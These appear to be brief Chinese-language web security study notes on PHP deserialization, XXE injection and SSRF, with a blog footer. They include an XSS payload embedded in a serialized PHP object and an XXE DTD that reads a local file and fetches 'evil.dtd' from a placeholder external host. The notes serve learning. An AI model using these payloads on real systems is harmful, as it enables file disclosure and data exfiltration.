serialize($test)序列化
unserialize($test2)反序列化
payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>"
XXE(XML External Entity Injection) 全称为 XML 外部实体注入
payload中file:///d:/test.txt 为注入点,外部实体
1 <?xml version="1.0" encoding="utf-8"?> 2 <!DOCTYPE roottag [ 3 <!ENTITY % start "<![CDATA["> 4 <!ENTITY % goodies SYSTEM "file:///d:/test.txt"> 5 <!ENTITY % end "]]>"> 6 <!ENTITY % dtd SYSTEM "http://ip/evil.dtd"> 7 %dtd; ]> 8 9 <roottag>&all;</roottag>
SSRF全称为服务器端请求伪造
攻击者→服务器→目标地址
php中以下函数使用不当会导致ssrf
file_get_contents()
fsockopen()
curl_exec()
浙公网安备 33010602011771号